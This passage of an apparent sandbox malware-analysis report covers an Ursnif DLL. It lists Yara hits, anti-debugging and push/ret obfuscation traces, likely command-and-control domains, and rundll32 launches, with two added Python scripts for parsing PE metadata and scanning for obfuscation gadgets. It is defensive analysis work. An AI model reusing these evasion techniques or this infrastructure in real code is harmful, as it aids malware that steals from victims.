                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb& source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbM source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.542799224.000000000311B000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdbb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbk source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb_ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb* source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbKi source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbK source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb2 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb\ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdbh source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbh source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.697038895.000000006E78B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.698211502.000000006E78B000.00000002.00020000.sdmp, m87xfb63XU.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbz source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb, source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000013.00000003.542887533.0000000003126000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbn source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.542852774.0000000003121000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
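                      Of the .pdb strings above, only c:\wheel\receive\Many-rise\score.pdb comes from the sample: its sources are m87xfb63XU.dll itself and the mapped image at 0x6E78B000 in loaddll32.exe and rundll32.exe, which is what the IMAGE_DIRECTORY_ENTRY_DEBUG entry in the static PE information points at. Every other .pdb name is sourced from WerFault.exe memory and is simply the symbol name of a Windows system library that the crash handler had loaded or enumerated while processing the three rundll32 crashes; those strings say nothing about the sample. The script below is an added example, not part of the report, showing how the three pieces of static evidence the report lists for the DLL (the export names BeGrass, Fieldeight and Often, the CodeView PDB path, and the DYNAMIC_BASE/NX_COMPAT DllCharacteristics) are read straight out of a PE32 file without a PE library. The real sample is not embedded in the page, so the script first constructs a minimal synthetic DLL carrying those values and then parses it; the parser itself is generic for any PE32 file.

```python
import struct

# Export names, PDB path and DllCharacteristics are the ones this report lists
# for the sample; the PE that carries them is a minimal synthetic DLL built
# here, because the real sample is not embedded in the page.
EXPORT_NAMES = ["BeGrass", "Fieldeight", "Often"]
PDB_PATH = "c:\\wheel\\receive\\Many-rise\\score.pdb"
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x4000: "GUARD_CF"}


def build_sample_dll():
    """Construct a PE32 DLL with one section holding an export table and a
    CodeView (RSDS) debug record, DllCharacteristics = DYNAMIC_BASE|NX_COMPAT."""
    sec_rva, sec_off = 0x1000, 0x400
    blob = bytearray()

    def place(data):                     # append to the section, 4-byte aligned
        rva = sec_rva + len(blob)
        blob.extend(data)
        blob.extend(b"\0" * (-len(blob) % 4))
        return rva

    n = len(EXPORT_NAMES)
    name_rvas = [place(s.encode() + b"\0") for s in EXPORT_NAMES]
    dllname_rva = place(b"m87xfb63XU.dll\0")
    funcs_rva = place(b"".join(struct.pack("<I", 0x2000 + 0x10 * i) for i in range(n)))
    names_rva = place(b"".join(struct.pack("<I", r) for r in name_rvas))
    ords_rva = place(b"".join(struct.pack("<H", i) for i in range(n)))
    export_rva = place(struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, dllname_rva, 1, n, n,
                                   funcs_rva, names_rva, ords_rva))
    cv = b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1) + PDB_PATH.encode() + b"\0"
    cv_rva = place(cv)
    debug_rva = place(struct.pack("<IIHHIIII", 0, 0, 0, 0, 2, len(cv), cv_rva,
                                  sec_off + cv_rva - sec_rva))   # type 2 = CODEVIEW

    opt = bytearray(224)                                     # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                    # Magic
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)          # Section/File alignment
    struct.pack_into("<II", opt, 56, sec_rva + len(blob), sec_off)  # SizeOfImage/Headers
    struct.pack_into("<H", opt, 70, 0x0140)                  # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 0, export_rva, 40)  # EXPORT directory
    struct.pack_into("<II", opt, 96 + 8 * 6, debug_rva, 28)   # DEBUG directory
    sect = struct.pack("<8sIIIIIIHHI", b".rdata\0\0", len(blob), sec_rva, len(blob),
                       sec_off, 0, 0, 0, 0, 0x40000040)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x2102)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    return header.ljust(sec_off, b"\0") + bytes(blob)


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def parse_pe(data):
    """Return exports, CodeView PDB path and DllCharacteristics of a PE32 file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("PE32 only; PE32+ keeps its directories at +112, not +96")
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = [struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)[1:]
                for i in range(nsect)]

    def off(rva):                        # RVA -> file offset via the section table
        for vsize, va, rawsize, rawptr in sections:
            if va <= rva < va + max(vsize, rawsize):
                return rva - va + rawptr
        raise ValueError("RVA 0x%x is outside every section" % rva)

    exports = []
    if ndirs > 0 and dirs[0][0]:
        e = struct.unpack_from("<IIHHIIIIIII", data, off(dirs[0][0]))
        for i in range(e[7]):            # e[7] = NumberOfNames, e[9] = AddressOfNames
            name_rva = struct.unpack_from("<I", data, off(e[9]) + 4 * i)[0]
            exports.append(_cstr(data, off(name_rva)))
    pdb = None
    if ndirs > 6 and dirs[6][0]:
        for i in range(dirs[6][1] // 28):
            d = struct.unpack_from("<IIHHIIII", data, off(dirs[6][0]) + 28 * i)
            if d[4] == 2 and data[d[7]:d[7] + 4] == b"RSDS":   # CODEVIEW via PointerToRawData
                pdb = _cstr(data, d[7] + 24)                   # past RSDS + GUID + Age
    flags = [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if dllchar & bit]
    return {"exports": exports, "pdb": pdb, "dll_characteristics": flags}


if __name__ == "__main__":
    print(parse_pe(build_sample_dll()))
```

Run against the real file, parse_pe(open(path, "rb").read()) gives the same three fields; a PDB path like the one here (a throwaway build directory with unrelated words) alongside export names that are ordinary English words is a pattern worth keying on across a family's builds, since the DllCharacteristics and section layout change far less often than the file hash.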
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E712150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7121A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0303AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0303ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E74AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E74AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_029FC806 pushad ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_029FC857 pushad ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0027BFA4 push esp; retn 0027h
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0027C330 push esp; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E711DE5 LoadLibraryA,GetProcAddress,
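                      The push/ret pairs listed above (push ecx; ret, pushad; retf, push esp; retn 0027h) are what the report's "code obfuscation techniques (call, push, ret)" signature keys on: a push followed by a return transfers control to whatever was pushed without a call or jmp, so a linear disassembler sees a function epilogue where there is really a jump. The scanner below is an added example, not part of the report or of the sample, and runs over a constructed byte buffer. It goes slightly beyond the report's register-push instances and also matches the push imm32; ret form, which is the classic obfuscated jump of which push reg; ret is the register variant. Byte-pattern matching at every offset also hits inside data and inside legitimate compiler output, so treat hits as candidates to confirm in a disassembler rather than as a verdict.

```python
# x86 opcode bytes for the instruction pairs listed above. The buffer scanned
# at the bottom is constructed for the example; it is not sample code.
PUSH_REG = {0x50 + i: "push " + r for i, r in enumerate(
    ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
PUSH_REG[0x60] = "pushad"
RET = {0xC3: "ret", 0xCB: "retf"}               # near / far return, no operand
RET_IMM16 = {0xC2: "retn", 0xCA: "retf"}        # return that also pops imm16 bytes


def find_push_ret(code, base=0):
    """Return (address, mnemonic) for every push/pushad/push imm32 immediately
    followed by a return, scanning every byte offset (no alignment assumed)."""
    hits = []
    for i in range(len(code) - 1):
        op, nxt = code[i], code[i + 1]
        if op == 0x68 and i + 5 < len(code) and code[i + 5] in RET:   # push imm32; ret
            target = int.from_bytes(code[i + 1:i + 5], "little")
            hits.append((base + i, "push %08Xh; %s" % (target, RET[code[i + 5]])))
        elif op in PUSH_REG and nxt in RET:
            hits.append((base + i, "%s; %s" % (PUSH_REG[op], RET[nxt])))
        elif op in PUSH_REG and nxt in RET_IMM16 and i + 3 < len(code):
            imm = int.from_bytes(code[i + 2:i + 4], "little")
            hits.append((base + i, "%s; %s %04Xh" % (PUSH_REG[op], RET_IMM16[nxt], imm)))
    return hits


def gadget_density(code, window=0x1000):
    """Hits per window-sized chunk; a spike marks a region worth disassembling,
    which is more useful than any single hit given the false-positive rate."""
    counts = {}
    for addr, _ in find_push_ret(code):
        counts[addr // window] = counts.get(addr // window, 0) + 1
    return counts


# Constructed buffer: one ordinary prologue, the three pairs the report lists,
# a push imm32; ret, and a stray ret that must not match.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                      # push ebp; mov ebp, esp
    0x51, 0xC3,                            # push ecx; ret
    0x90, 0x90,                            # nop; nop
    0x60, 0xCB,                            # pushad; retf
    0x54, 0xC2, 0x27, 0x00,                # push esp; retn 0027h
    0x68, 0x78, 0x56, 0x34, 0x12, 0xC3,    # push 12345678h; ret
    0xC3,                                  # ret with no preceding push
])

if __name__ == "__main__":
    for addr, text in find_push_ret(SAMPLE, base=0x6E710000):
        print("%08X  %s" % (addr, text))
```

The scan takes a raw byte buffer, so it works equally on the file's .text section and on a memory dump such as the 5.3 and 6.3 rundll32 regions the report unpacked; the addresses it reports are base plus offset, where base is whatever the region was mapped at.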

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6316, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORYSTR
                      Source: Yara match | File source: 3.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.35794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.2dca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.2a0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.2dca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.35794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.2a0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.265a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.265a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.2e7a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.4d394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.143a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.2e7a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.143a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.4d394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 0000000D.00000002.542983024.0000000005680000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp
                      Source: WerFault.exe, 0000000D.00000002.542441671.0000000005224000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.567481007.0000000004EB2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 0000000F.00000002.555925755.0000000004ED0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW(
                      Source: WerFault.exe, 00000013.00000003.565081331.0000000004EB2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E756CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E76C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E778861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BDFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BDEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BDBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E76C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E778861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7BDFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7BDEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7BDBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E74B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E756CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E74B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.60.226 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.135.82 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.153.146 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.695464015.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.511070364.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.697073866.00000000035B0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.519152173.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.531338001.0000000002C10000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.695464015.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.511070364.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.697073866.00000000035B0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.519152173.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.531338001.0000000002C10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.695464015.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.511070364.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.697073866.00000000035B0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.519152173.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.531338001.0000000002C10000.00000002.00020000.sdmpBinary or memory string: Progman
